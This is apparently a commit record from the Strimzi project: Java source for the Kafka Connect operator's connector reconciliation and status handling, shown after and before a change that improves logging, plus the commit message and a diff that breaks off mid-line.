connectorFutures.add(maybeUpdateConnectorStatus(reconciliation, connector, null, noConnectCluster(reconciliation.namespace(), reconciliation.name()))); } return CompositeFuture.join(connectorFutures); }).map(ignored -> Boolean.FALSE); } /** * Create a watch on {@code KafkaConnector} in the given {@code namespace}. * The watcher will: * <ul> * <li>{@link #reconcileConnectors(Reconciliation, CustomResource)} on the KafkaConnect or KafkaConnectS2I * identified by {@code KafkaConnector.metadata.labels[strimzi.io/cluster]}.</li> * <li>If there is a Connect and ConnectS2I cluster with the given name then the plain Connect one is used * (and an error is logged about the ambiguity).</li> * <li>The {@code KafkaConnector} status is updated with the result.</li> * </ul> * @param connectOperator The operator for {@code KafkaConnect}. * @param connectS2IOperator The operator for {@code KafkaConnectS2I}. * @param watchNamespaceOrWildcard The namespace to watch. * @return A future which completes when the watch has been set up. 
*/ public static Future<Void> createConnectorWatch(AbstractConnectOperator<KubernetesClient, KafkaConnect, KafkaConnectList, DoneableKafkaConnect, Resource<KafkaConnect, DoneableKafkaConnect>> connectOperator, AbstractConnectOperator<OpenShiftClient, KafkaConnectS2I, KafkaConnectS2IList, DoneableKafkaConnectS2I, Resource<KafkaConnectS2I, DoneableKafkaConnectS2I>> connectS2IOperator, String watchNamespaceOrWildcard) { return Util.async(connectOperator.vertx, () -> { connectOperator.connectorOperator.watch(watchNamespaceOrWildcard, new Watcher<KafkaConnector>() { @Override public void eventReceived(Action action, KafkaConnector kafkaConnector) { String connectorName = kafkaConnector.getMetadata().getName(); String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); String connectorKind = kafkaConnector.getKind(); String connectName = kafkaConnector.getMetadata().getLabels() == null ? null : kafkaConnector.getMetadata().getLabels().get(Labels.STRIMZI_CLUSTER_LABEL); String connectNamespace = connectorNamespace; switch (action) { case ADDED: case DELETED: case MODIFIED: Future<Void> f; if (connectName != null) { // Check whether a KafkaConnect/S2I exists CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), connectOperator.pfa.supportsS2I() ? connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : Future.succeededFuture()) .compose(cf -> { KafkaConnect connect = cf.resultAt(0); KafkaConnectS2I connectS2i = cf.resultAt(1); KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); if (connect == null && connectS2i == null) { log.info("{} {} in namespace {} was {}, but Connect cluster {} does not exist", connectorKind, connectorName, connectorNamespace, action, connectName); updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); return Future.succeededFuture(); } else if (connect != null) { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); if (connectS2i != null) { log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + "The KafkaConnect takes precedence for the connector {}", reconciliation, connectName, connect.getMetadata().getName()); } return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, () -> connectOperator.reconcileConnector(reconciliation, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connect), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) .compose(reconcileResult -> { log.info("{}: reconciled", reconciliation); return Future.succeededFuture(reconcileResult); })); } else { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). 
Reconciliation reconciliation = new Reconciliation("connector-watch", connectS2IOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); return connectS2IOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, () -> connectS2IOperator.reconcileConnector(reconciliation, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connectS2i), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) .compose(reconcileResult -> { log.info("{}: reconciled", reconciliation); return Future.succeededFuture(reconcileResult); })); } }); } else { updateStatus(new InvalidResourceException("Resource lacks label '" + Labels.STRIMZI_CLUSTER_LABEL + "': No connect cluster in which to create this connector."), kafkaConnector, connectOperator.connectorOperator); } break; case ERROR: log.error("Failed {} {} in namespace {} ", connectorKind, connectorName, connectorNamespace); break; default: log.error("Unknown action: {} {} in namespace {}", connectorKind, connectorName, connectorNamespace); } } @Override public void onClose(KubernetesClientException e) { if (e != null) { throw e; } } }); return null; }); } public static boolean isUseResources(HasMetadata connect) { return Annotations.booleanAnnotation(connect, STRIMZI_IO_USE_CONNECTOR_RESOURCES, false); } private static NoSuchResourceException noConnectCluster(String connectNamespace, String connectName) { return new NoSuchResourceException( "KafkaConnect resource '" + connectName + "' identified by label '" + Labels.STRIMZI_CLUSTER_LABEL + "' does not exist in namespace " + connectNamespace + "."); } /** * Reconcile all the connectors selected by the given connect instance, updated each connectors status with the result. * @param reconciliation The reconciliation * @param connect The connector * @return A future, failed if any of the connectors' statuses could not be updated. 
*/ protected Future<Void> reconcileConnectors(Reconciliation reconciliation, T connect) { String connectName = connect.getMetadata().getName(); String namespace = connect.getMetadata().getNamespace(); String host = KafkaConnectResources.serviceName(connectName); KafkaConnectApi apiClient = connectClientProvider.apply(vertx); boolean useResources = isUseResources(connect); return CompositeFuture.join(apiClient.list(host, KafkaConnectCluster.REST_API_PORT), connectorOperator.listAsync(namespace, Optional.of(new LabelSelectorBuilder().addToMatchLabels(Labels.STRIMZI_CLUSTER_LABEL, connectName).build())) ).compose(cf -> { List<String> runningConnectorNames = cf.resultAt(0); List<KafkaConnector> desiredConnectors = cf.resultAt(1); log.debug("{}: {} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); Set<String> deleteConnectorNames = new HashSet<>(runningConnectorNames); deleteConnectorNames.removeAll(desiredConnectors.stream().map(c -> c.getMetadata().getName()).collect(Collectors.toSet())); log.debug("{}: {} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); Stream<Future<Void>> deletionFutures = deleteConnectorNames.stream().map(connectorName -> reconcileConnector(reconciliation, host, apiClient, useResources, connectorName, null) ); Stream<Future<Void>> createUpdateFutures = desiredConnectors.stream() .map(connector -> reconcileConnector(reconciliation, host, apiClient, useResources, connector.getMetadata().getName(), connector)); return CompositeFuture.join(Stream.concat(deletionFutures, createUpdateFutures).collect(Collectors.toList())).map((Void) null); }); } private Future<Void> reconcileConnector(Reconciliation reconciliation, String host, KafkaConnectApi apiClient, boolean useResources, String connectorName, KafkaConnector connector) { if (connector == null) { if (useResources) { log.info("{}: deleting connector: {}", reconciliation, connectorName); return apiClient.delete(host, KafkaConnectCluster.REST_API_PORT, connectorName); } else { return Future.succeededFuture(); } } else { log.info("{}: creating/updating connector: {}", reconciliation, connectorName); if (connector.getSpec() == null) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new InvalidResourceException("spec property is required")); } if (!useResources) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new NoSuchResourceException(reconciliation.kind() + " " + reconciliation.name() + " is not configured with annotation " + STRIMZI_IO_USE_CONNECTOR_RESOURCES)); } else { Promise<Void> promise = Promise.promise(); apiClient.createOrUpdatePutRequest(host, KafkaConnectCluster.REST_API_PORT, connectorName, asJson(connector.getSpec())) .compose(ignored -> apiClient.statusWithBackOff(new BackOff(200L, 2, 6), host, KafkaConnectCluster.REST_API_PORT, connectorName)) .compose(status -> { Object path = ((Map) status.getOrDefault("connector", emptyMap())).get("state"); if (!(path instanceof String)) { return Future.failedFuture("JSON response lacked $.connector.state"); } else { String state = (String) path; boolean shouldPause = Boolean.TRUE.equals(connector.getSpec().getPause()); if ("RUNNING".equals(state) && shouldPause) { log.debug("{}: Pausing connector {}", reconciliation, connectorName); return apiClient.pause(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else if ("PAUSED".equals(state) && !shouldPause) { log.debug("{}: 
Resuming connector {}", reconciliation, connectorName); return apiClient.resume(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else { return Future.succeededFuture(status); } } }) .setHandler(result -> { if (result.succeeded()) { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), null); } else { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), result.cause()); } promise.complete(); }); return promise.future(); } } } public static void updateStatus(Throwable error, KafkaConnector kafkaConnector2, CrdOperator<?, KafkaConnector, ?, ?> connectorOperations) { KafkaConnectorStatus status = new KafkaConnectorStatus(); StatusUtils.setStatusConditionAndObservedGeneration(kafkaConnector2, status, error); StatusDiff diff = new StatusDiff(kafkaConnector2.getStatus(), status); if (!diff.isEmpty()) { KafkaConnector copy = new KafkaConnectorBuilder(kafkaConnector2).build(); copy.setStatus(status); connectorOperations.updateStatusAsync(copy); } } Future<Void> maybeUpdateConnectorStatus(Reconciliation reconciliation, KafkaConnector connector, Map<String, Object> statusResult, Throwable error) { KafkaConnectorStatus status = new KafkaConnectorStatus(); if (error != null) { log.warn("{}: Error reconciling connector {}", reconciliation, connector.getMetadata().getName(), error); } StatusUtils.setStatusConditionAndObservedGeneration(connector, status, error != null ? Future.failedFuture(error) : Future.succeededFuture()); status.setConnectorStatus(statusResult); return maybeUpdateStatusCommon(connectorOperator, connector, reconciliation, status, (connector1, status1) -> { return new KafkaConnectorBuilder(connector1).withStatus(status1).build(); }); } private JsonObject asJson(KafkaConnectorSpec spec) { JsonObject connectorConfigJson = new JsonObject(); if (spec.getConfig() != null) { for (Map.Entry<String, Object> cf : spec.getConfig().entrySet()) { String name = cf.getKey(); if ("connector.class".equals(name) || "tasks.max".equals(name)) { // TODO include resource namespace and name in this message log.warn("Configuration parameter {} in KafkaConnector.spec.config will be ignored and the value from KafkaConnector.spec will be used instead", name); } connectorConfigJson.put(name, cf.getValue()); } } return connectorConfigJson .put("connector.class", spec.getClassName()) .put("tasks.max", spec.getTasksMax()); } /** * Updates the Status field of the KafkaConnect or KafkaConnector CR. It diffs the desired status against the current status and calls * the update only when there is any difference in non-timestamp fields. 
* * @param resource The CR of KafkaConnect or KafkaConnector * @param reconciliation Reconciliation information * @param desiredStatus The KafkaConnectStatus or KafkaConnectorStatus which should be set * * @return */ protected <T extends CustomResource & HasStatus<S>, S extends Status, L extends CustomResourceList<T>, D extends Doneable<T>> Future<Void> maybeUpdateStatusCommon(CrdOperator<KubernetesClient, T, L, D> resourceOperator, T resource, Reconciliation reconciliation, S desiredStatus, BiFunction<T, S, T> copyWithStatus) { Promise<Void> updateStatusPromise = Promise.promise(); resourceOperator.getAsync(resource.getMetadata().getNamespace(), resource.getMetadata().getName()).setHandler(getRes -> { if (getRes.succeeded()) { T fetchedResource = getRes.result(); if (fetchedResource != null) { if ((!(fetchedResource instanceof KafkaConnector)) && StatusUtils.isResourceV1alpha1(fetchedResource)) { log.warn("{}: {} {} needs to be upgraded from version {} to 'v1beta1' to use the status field", reconciliation, fetchedResource.getKind(), fetchedResource.getMetadata().getName(), fetchedResource.getApiVersion()); updateStatusPromise.complete(); } else { S currentStatus = fetchedResource.getStatus(); StatusDiff ksDiff = new StatusDiff(currentStatus, desiredStatus); if (!ksDiff.isEmpty()) { T resourceWithNewStatus = copyWithStatus.apply(fetchedResource, desiredStatus); resourceOperator.updateStatusAsync(resourceWithNewStatus).setHandler(updateRes -> { if (updateRes.succeeded()) { log.debug("{}: Completed status update", reconciliation); updateStatusPromise.complete(); } else { log.error("{}: Failed to update status", reconciliation, updateRes.cause()); updateStatusPromise.fail(updateRes.cause()); } }); } else { log.debug("{}: Status did not change", reconciliation); updateStatusPromise.complete(); } } } else { log.error("{}: Current {} resource not found", reconciliation, resource.getKind()); updateStatusPromise.fail("Current " + resource.getKind() + " resource not found"); } } else { log.error("{}: Failed to get the current {} resource and its status", reconciliation, resource.getKind(), getRes.cause()); updateStatusPromise.fail(getRes.cause()); } }); return updateStatusPromise.future(); } }
cluster-operator/src/main/java/io/strimzi/operator/cluster/operator/assembly/AbstractConnectOperator.java
/* * Copyright Strimzi authors. * License: Apache License 2.0 (see the file LICENSE or http://apache.org/licenses/LICENSE-2.0.html). */ package io.strimzi.operator.cluster.operator.assembly; import io.fabric8.kubernetes.api.model.Doneable; import io.fabric8.kubernetes.api.model.HasMetadata; import io.fabric8.kubernetes.api.model.LabelSelectorBuilder; import io.fabric8.kubernetes.api.model.LocalObjectReference; import io.fabric8.kubernetes.client.CustomResource; import io.fabric8.kubernetes.client.CustomResourceList; import io.fabric8.kubernetes.client.KubernetesClient; import io.fabric8.kubernetes.client.KubernetesClientException; import io.fabric8.kubernetes.client.Watcher; import io.fabric8.kubernetes.client.dsl.Resource; import io.fabric8.openshift.client.OpenShiftClient; import io.strimzi.api.kafka.KafkaConnectList; import io.strimzi.api.kafka.KafkaConnectS2IList; import io.strimzi.api.kafka.KafkaConnectorList; import io.strimzi.api.kafka.model.DoneableKafkaConnect; import io.strimzi.api.kafka.model.DoneableKafkaConnectS2I; import io.strimzi.api.kafka.model.DoneableKafkaConnector; import io.strimzi.api.kafka.model.KafkaConnect; import io.strimzi.api.kafka.model.KafkaConnectResources; import io.strimzi.api.kafka.model.KafkaConnectS2I; import io.strimzi.api.kafka.model.KafkaConnector; import io.strimzi.api.kafka.model.KafkaConnectorBuilder; import io.strimzi.api.kafka.model.KafkaConnectorSpec; import io.strimzi.api.kafka.model.status.HasStatus; import io.strimzi.api.kafka.model.status.KafkaConnectorStatus; import io.strimzi.api.kafka.model.status.Status; import io.strimzi.operator.PlatformFeaturesAvailability; import io.strimzi.operator.cluster.ClusterOperatorConfig; import io.strimzi.operator.cluster.model.ImagePullPolicy; import io.strimzi.operator.cluster.model.InvalidResourceException; import io.strimzi.operator.cluster.model.KafkaConnectCluster; import io.strimzi.operator.cluster.model.NoSuchResourceException; import io.strimzi.operator.cluster.model.StatusDiff; import io.strimzi.operator.cluster.operator.resource.ResourceOperatorSupplier; import io.strimzi.operator.common.AbstractOperator; import io.strimzi.operator.common.Annotations; import io.strimzi.operator.common.BackOff; import io.strimzi.operator.common.Reconciliation; import io.strimzi.operator.common.Util; import io.strimzi.operator.common.model.Labels; import io.strimzi.operator.common.operator.resource.ConfigMapOperator; import io.strimzi.operator.common.operator.resource.CrdOperator; import io.strimzi.operator.common.operator.resource.PodDisruptionBudgetOperator; import io.strimzi.operator.common.operator.resource.ServiceAccountOperator; import io.strimzi.operator.common.operator.resource.ServiceOperator; import io.strimzi.operator.common.operator.resource.StatusUtils; import io.vertx.core.CompositeFuture; import io.vertx.core.Future; import io.vertx.core.Promise; import io.vertx.core.Vertx; import io.vertx.core.json.JsonObject; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.function.BiFunction; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static java.util.Collections.emptyMap; public abstract class AbstractConnectOperator<C extends KubernetesClient, T extends CustomResource, L extends CustomResourceList<T>, D extends Doneable<T>, R extends Resource<T, D>> 
extends AbstractOperator<T, CrdOperator<C, T, L, D>> { private static final Logger log = LogManager.getLogger(AbstractConnectOperator.class.getName()); public static final String STRIMZI_IO_USE_CONNECTOR_RESOURCES = "strimzi.io/use-connector-resources"; private final CrdOperator<KubernetesClient, KafkaConnector, KafkaConnectorList, DoneableKafkaConnector> connectorOperator; private final Function<Vertx, KafkaConnectApi> connectClientProvider; protected final ImagePullPolicy imagePullPolicy; protected final ConfigMapOperator configMapOperations; protected final ServiceOperator serviceOperations; protected final PodDisruptionBudgetOperator podDisruptionBudgetOperator; protected final List<LocalObjectReference> imagePullSecrets; protected final long operationTimeoutMs; protected final PlatformFeaturesAvailability pfa; protected final ServiceAccountOperator serviceAccountOperations; public AbstractConnectOperator(Vertx vertx, PlatformFeaturesAvailability pfa, String kind, CrdOperator<C, T, L, D> resourceOperator, ResourceOperatorSupplier supplier, ClusterOperatorConfig config, Function<Vertx, KafkaConnectApi> connectClientProvider) { super(vertx, kind, resourceOperator); this.connectorOperator = supplier.kafkaConnectorOperator; this.connectClientProvider = connectClientProvider; this.configMapOperations = supplier.configMapOperations; this.serviceOperations = supplier.serviceOperations; this.serviceAccountOperations = supplier.serviceAccountOperations; this.podDisruptionBudgetOperator = supplier.podDisruptionBudgetOperator; this.imagePullPolicy = config.getImagePullPolicy(); this.imagePullSecrets = config.getImagePullSecrets(); this.operationTimeoutMs = config.getOperationTimeoutMs(); this.pfa = pfa; } @Override protected Future<Boolean> delete(Reconciliation reconciliation) { // When deleting KafkaConnect we need to update the status of all selected KafkaConnector return connectorOperator.listAsync(reconciliation.namespace(), Labels.forCluster(reconciliation.name())).compose(connectors -> { List<Future> connectorFutures = new ArrayList<>(); for (KafkaConnector connector : connectors) { connectorFutures.add(maybeUpdateConnectorStatus(reconciliation, connector, null, noConnectCluster(reconciliation.namespace(), reconciliation.name()))); } return CompositeFuture.join(connectorFutures); }).map(ignored -> Boolean.FALSE); } /** * Create a watch on {@code KafkaConnector} in the given {@code namespace}. * The watcher will: * <ul> * <li>{@link #reconcileConnectors(Reconciliation, CustomResource)} on the KafkaConnect or KafkaConnectS2I * identified by {@code KafkaConnector.metadata.labels[strimzi.io/cluster]}.</li> * <li>If there is a Connect and ConnectS2I cluster with the given name then the plain Connect one is used * (and an error is logged about the ambiguity).</li> * <li>The {@code KafkaConnector} status is updated with the result.</li> * </ul> * @param connectOperator The operator for {@code KafkaConnect}. * @param connectS2IOperator The operator for {@code KafkaConnectS2I}. * @param watchNamespaceOrWildcard The namespace to watch. * @return A future which completes when the watch has been set up. 
*/ public static Future<Void> createConnectorWatch(AbstractConnectOperator<KubernetesClient, KafkaConnect, KafkaConnectList, DoneableKafkaConnect, Resource<KafkaConnect, DoneableKafkaConnect>> connectOperator, AbstractConnectOperator<OpenShiftClient, KafkaConnectS2I, KafkaConnectS2IList, DoneableKafkaConnectS2I, Resource<KafkaConnectS2I, DoneableKafkaConnectS2I>> connectS2IOperator, String watchNamespaceOrWildcard) { return Util.async(connectOperator.vertx, () -> { connectOperator.connectorOperator.watch(watchNamespaceOrWildcard, new Watcher<KafkaConnector>() { @Override public void eventReceived(Action action, KafkaConnector kafkaConnector) { String connectName = kafkaConnector.getMetadata().getLabels() == null ? null : kafkaConnector.getMetadata().getLabels().get(Labels.STRIMZI_CLUSTER_LABEL); String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); String connectNamespace = connectorNamespace; Future<Void> f; if (connectName != null) { // Check whether a KafkaConnect/S2I exists CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), connectOperator.pfa.supportsS2I() ? connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : Future.succeededFuture()) .compose(cf -> { KafkaConnect connect = cf.resultAt(0); KafkaConnectS2I connectS2i = cf.resultAt(1); KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); if (connect == null && connectS2i == null) { updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); return Future.succeededFuture(); } else if (connect != null) { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); if (connectS2i != null) { log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + "The KafkaConnect takes precedence for the connector {}", reconciliation, connectName, connect.getMetadata().getName()); } return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, () -> connectOperator.reconcileConnector(reconciliation, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connect), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector)); } else { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation r = new Reconciliation("connector-watch", connectS2IOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); return connectS2IOperator.withLock(r, LOCK_TIMEOUT_MS, () -> connectS2IOperator.reconcileConnector(r, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connectS2i), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? 
null : kafkaConnector)); } } ); } else { updateStatus(new InvalidResourceException("Resource lacks label '" + Labels.STRIMZI_CLUSTER_LABEL + "': No connect cluster in which to create this connector."), kafkaConnector, connectOperator.connectorOperator); } } @Override public void onClose(KubernetesClientException e) { if (e != null) { throw e; } } }); return null; }); } public static boolean isUseResources(HasMetadata connect) { return Annotations.booleanAnnotation(connect, STRIMZI_IO_USE_CONNECTOR_RESOURCES, false); } private static NoSuchResourceException noConnectCluster(String connectNamespace, String connectName) { return new NoSuchResourceException( "KafkaConnect resource '" + connectName + "' identified by label '" + Labels.STRIMZI_CLUSTER_LABEL + "' does not exist in namespace " + connectNamespace + "."); } /** * Reconcile all the connectors selected by the given connect instance, updated each connectors status with the result. * @param reconciliation The reconciliation * @param connect The connector * @return A future, failed if any of the connectors' statuses could not be updated. */ protected Future<Void> reconcileConnectors(Reconciliation reconciliation, T connect) { String connectName = connect.getMetadata().getName(); String namespace = connect.getMetadata().getNamespace(); String host = KafkaConnectResources.serviceName(connectName); KafkaConnectApi apiClient = connectClientProvider.apply(vertx); boolean useResources = isUseResources(connect); return CompositeFuture.join(apiClient.list(host, KafkaConnectCluster.REST_API_PORT), connectorOperator.listAsync(namespace, Optional.of(new LabelSelectorBuilder().addToMatchLabels(Labels.STRIMZI_CLUSTER_LABEL, connectName).build())) ).compose(cf -> { List<String> runningConnectorNames = cf.resultAt(0); List<KafkaConnector> desiredConnectors = cf.resultAt(1); log.debug("{}: {}} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); Set<String> deleteConnectorNames = new HashSet<>(runningConnectorNames); deleteConnectorNames.removeAll(desiredConnectors.stream().map(c -> c.getMetadata().getName()).collect(Collectors.toSet())); log.debug("{}: {}} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); Stream<Future<Void>> deletionFutures = deleteConnectorNames.stream().map(connectorName -> reconcileConnector(reconciliation, host, apiClient, useResources, connectorName, null) ); Stream<Future<Void>> createUpdateFutures = desiredConnectors.stream() .map(connector -> reconcileConnector(reconciliation, host, apiClient, useResources, connector.getMetadata().getName(), connector)); return CompositeFuture.join(Stream.concat(deletionFutures, createUpdateFutures).collect(Collectors.toList())).map((Void) null); }); } private Future<Void> reconcileConnector(Reconciliation reconciliation, String host, KafkaConnectApi apiClient, boolean useResources, String connectorName, KafkaConnector connector) { if (connector == null) { if (useResources) { log.debug("{}: {}} cluster: deleting connector: {}", reconciliation, kind(), connectorName); return apiClient.delete(host, KafkaConnectCluster.REST_API_PORT, connectorName); } else { return Future.succeededFuture(); } } else { log.debug("{}: {}} cluster: creating/updating connector: {}", reconciliation, kind(), connectorName); if (connector.getSpec() == null) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new InvalidResourceException("spec property is required")); } if (!useResources) { return maybeUpdateConnectorStatus(reconciliation, 
connector, null, new NoSuchResourceException(reconciliation.kind() + " " + reconciliation.name() + " is not configured with annotation " + STRIMZI_IO_USE_CONNECTOR_RESOURCES)); } else { Promise<Void> promise = Promise.promise(); apiClient.createOrUpdatePutRequest(host, KafkaConnectCluster.REST_API_PORT, connectorName, asJson(connector.getSpec())) .compose(ignored -> apiClient.statusWithBackOff(new BackOff(200L, 2, 6), host, KafkaConnectCluster.REST_API_PORT, connectorName)) .compose(status -> { Object path = ((Map) status.getOrDefault("connector", emptyMap())).get("state"); if (!(path instanceof String)) { return Future.failedFuture("JSON response lacked $.connector.state"); } else { String state = (String) path; boolean shouldPause = Boolean.TRUE.equals(connector.getSpec().getPause()); if ("RUNNING".equals(state) && shouldPause) { log.debug("{}: Pausing connector {}", reconciliation, connectorName); return apiClient.pause(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else if ("PAUSED".equals(state) && !shouldPause) { log.debug("{}: Resuming connector {}", reconciliation, connectorName); return apiClient.resume(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else { return Future.succeededFuture(status); } } }) .setHandler(result -> { if (result.succeeded()) { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), null); } else { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), result.cause()); } promise.complete(); }); return promise.future(); } } } public static void updateStatus(Throwable error, KafkaConnector kafkaConnector2, CrdOperator<?, KafkaConnector, ?, ?> connectorOperations) { KafkaConnectorStatus status = new KafkaConnectorStatus(); StatusUtils.setStatusConditionAndObservedGeneration(kafkaConnector2, status, error); StatusDiff diff = new StatusDiff(kafkaConnector2.getStatus(), status); if (!diff.isEmpty()) { KafkaConnector copy = new KafkaConnectorBuilder(kafkaConnector2).build(); copy.setStatus(status); connectorOperations.updateStatusAsync(copy); } } Future<Void> maybeUpdateConnectorStatus(Reconciliation reconciliation, KafkaConnector connector, Map<String, Object> statusResult, Throwable error) { KafkaConnectorStatus status = new KafkaConnectorStatus(); if (error != null) { log.warn("{}: Error reconciling connector {}", reconciliation, connector.getMetadata().getName(), error); } StatusUtils.setStatusConditionAndObservedGeneration(connector, status, error != null ? 
Future.failedFuture(error) : Future.succeededFuture()); status.setConnectorStatus(statusResult); return maybeUpdateStatusCommon(connectorOperator, connector, reconciliation, status, (connector1, status1) -> { return new KafkaConnectorBuilder(connector1).withStatus(status1).build(); }); } private JsonObject asJson(KafkaConnectorSpec spec) { JsonObject connectorConfigJson = new JsonObject(); if (spec.getConfig() != null) { for (Map.Entry<String, Object> cf : spec.getConfig().entrySet()) { String name = cf.getKey(); if ("connector.class".equals(name) || "tasks.max".equals(name)) { // TODO include resource namespace and name in this message log.warn("Configuration parameter {} in KafkaConnector.spec.config will be ignored and the value from KafkaConnector.spec will be used instead", name); } connectorConfigJson.put(name, cf.getValue()); } } return connectorConfigJson .put("connector.class", spec.getClassName()) .put("tasks.max", spec.getTasksMax()); } /** * Updates the Status field of the KafkaConnect or KafkaConnector CR. It diffs the desired status against the current status and calls * the update only when there is any difference in non-timestamp fields. * * @param resource The CR of KafkaConnect or KafkaConnector * @param reconciliation Reconciliation information * @param desiredStatus The KafkaConnectStatus or KafkaConnectorStatus which should be set * * @return */ protected <T extends CustomResource & HasStatus<S>, S extends Status, L extends CustomResourceList<T>, D extends Doneable<T>> Future<Void> maybeUpdateStatusCommon(CrdOperator<KubernetesClient, T, L, D> resourceOperator, T resource, Reconciliation reconciliation, S desiredStatus, BiFunction<T, S, T> copyWithStatus) { Promise<Void> updateStatusPromise = Promise.promise(); resourceOperator.getAsync(resource.getMetadata().getNamespace(), resource.getMetadata().getName()).setHandler(getRes -> { if (getRes.succeeded()) { T fetchedResource = getRes.result(); if (fetchedResource != null) { if ((!(fetchedResource instanceof KafkaConnector)) && StatusUtils.isResourceV1alpha1(fetchedResource)) { log.warn("{}: {} {} needs to be upgraded from version {} to 'v1beta1' to use the status field", reconciliation, fetchedResource.getKind(), fetchedResource.getMetadata().getName(), fetchedResource.getApiVersion()); updateStatusPromise.complete(); } else { S currentStatus = fetchedResource.getStatus(); StatusDiff ksDiff = new StatusDiff(currentStatus, desiredStatus); if (!ksDiff.isEmpty()) { T resourceWithNewStatus = copyWithStatus.apply(fetchedResource, desiredStatus); resourceOperator.updateStatusAsync(resourceWithNewStatus).setHandler(updateRes -> { if (updateRes.succeeded()) { log.debug("{}: Completed status update", reconciliation); updateStatusPromise.complete(); } else { log.error("{}: Failed to update status", reconciliation, updateRes.cause()); updateStatusPromise.fail(updateRes.cause()); } }); } else { log.debug("{}: Status did not change", reconciliation); updateStatusPromise.complete(); } } } else { log.error("{}: Current {} resource not found", reconciliation, resource.getKind()); updateStatusPromise.fail("Current " + resource.getKind() + " resource not found"); } } else { log.error("{}: Failed to get the current {} resource and its status", reconciliation, resource.getKind(), getRes.cause()); updateStatusPromise.fail(getRes.cause()); } }); return updateStatusPromise.future(); } }
Improve logging of the connector operator (#2419) Signed-off-by: Jakub Scholz <[email protected]>
cluster-operator/src/main/java/io/strimzi/operator/cluster/operator/assembly/AbstractConnectOperator.java
Improve logging of the connector operator (#2419)
<ide><path>luster-operator/src/main/java/io/strimzi/operator/cluster/operator/assembly/AbstractConnectOperator.java <ide> connectOperator.connectorOperator.watch(watchNamespaceOrWildcard, new Watcher<KafkaConnector>() { <ide> @Override <ide> public void eventReceived(Action action, KafkaConnector kafkaConnector) { <add> String connectorName = kafkaConnector.getMetadata().getName(); <add> String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); <add> String connectorKind = kafkaConnector.getKind(); <ide> String connectName = kafkaConnector.getMetadata().getLabels() == null ? null : kafkaConnector.getMetadata().getLabels().get(Labels.STRIMZI_CLUSTER_LABEL); <del> String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); <ide> String connectNamespace = connectorNamespace; <del> Future<Void> f; <del> if (connectName != null) { <del> // Check whether a KafkaConnect/S2I exists <del> CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), <del> connectOperator.pfa.supportsS2I() ? <del> connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : <del> Future.succeededFuture()) <del> .compose(cf -> { <del> KafkaConnect connect = cf.resultAt(0); <del> KafkaConnectS2I connectS2i = cf.resultAt(1); <del> KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); <del> if 